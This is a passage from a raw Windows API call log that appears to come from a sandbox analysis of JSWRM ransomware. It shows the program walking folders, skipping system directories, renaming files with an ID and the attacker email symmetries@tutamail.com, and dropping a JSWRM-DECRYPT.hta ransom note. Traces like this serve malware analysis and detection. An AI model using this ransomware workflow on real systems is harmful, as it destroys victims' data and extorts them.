nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0068.515] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0068.515] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0068.515] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0068.516] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0068.516] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0068.516] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0068.516] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0068.516] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0068.516] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0068.516] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0068.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0068.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0068.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0068.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0068.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0068.516] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0068.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.516] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.516] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0068.516] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.554] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10078089222803944) returned 0 [0068.554] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.554] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.554] CloseHandle (hObject=0xffffffff) returned 1 [0068.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0068.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0068.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0068.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0068.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0068.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0068.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.554] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0068.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0068.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0068.555] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e9592f9, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e9592f9, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e9592f9, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0068.555] FindClose (in: hFindFile=0x231bc0 | out: hFindFile=0x231bc0) returned 1 [0068.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0068.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0068.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.555] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076a026, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0068.555] lstrcmpiW (lpString1="ja-JP", lpString2=".") returned 1 [0068.555] lstrcmpiW (lpString1="ja-JP", lpString2="..") returned 1 [0068.555] lstrcmpiW (lpString1="ja-JP", lpString2="...") returned 1 [0068.555] lstrcmpiW (lpString1="ja-JP", lpString2="windows") returned -1 [0068.555] lstrcmpiW (lpString1="ja-JP", lpString2="recovery") returned -1 [0068.555] lstrcmpiW (lpString1="ja-JP", lpString2="perflogs") returned -1 [0068.555] lstrcmpiW (lpString1="ja-JP", lpString2="documents and settings") returned 1 [0068.555] lstrcmpiW (lpString1="ja-JP", lpString2="$RECYCLE.BIN") returned 1 [0068.555] lstrcmpiW (lpString1="ja-JP", lpString2="system volume information") returned -1 [0068.555] lstrcmpiW (lpString1="ja-JP", lpString2="msocache") returned -1 [0068.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0068.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0068.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0068.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0068.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0068.555] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\jswrm-decrypt.hta")) returned 0xffffffff [0068.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.556] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0068.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0068.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224ee8 [0068.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0068.556] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.558] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.558] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0068.559] CloseHandle (hObject=0x454) returned 1 [0068.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0068.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0068.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0068.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0068.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0068.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0068.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0068.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0068.559] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\jswrm-decrypt.hta")) returned 0x20 [0068.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224e60 | out: hHeap=0x1e0000) returned 1 [0068.559] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0068.559] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076a026, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f8637ee, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231b00 [0068.560] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.560] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076a026, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f8637ee, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0068.560] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.560] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.560] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f8637ee, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f8637ee, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f8637ee, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.560] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.560] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.560] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.560] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.560] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.560] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.560] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.560] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.560] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.560] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0068.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0068.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2413a8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0068.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0068.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0068.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0068.560] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e9592f9, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e9592f9, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e9592f9, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0068.560] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0068.560] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0068.560] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0068.561] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0068.561] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0068.561] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0068.561] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0068.561] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0068.561] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0068.561] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0068.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0068.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0068.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0068.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0068.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0068.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0068.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0068.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0068.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0068.561] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.561] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10083861658849264) returned 0 [0068.561] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.561] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0068.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.561] CloseHandle (hObject=0xffffffff) returned 1 [0068.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0068.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0068.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0068.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0068.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0068.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0068.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.562] MoveFileW 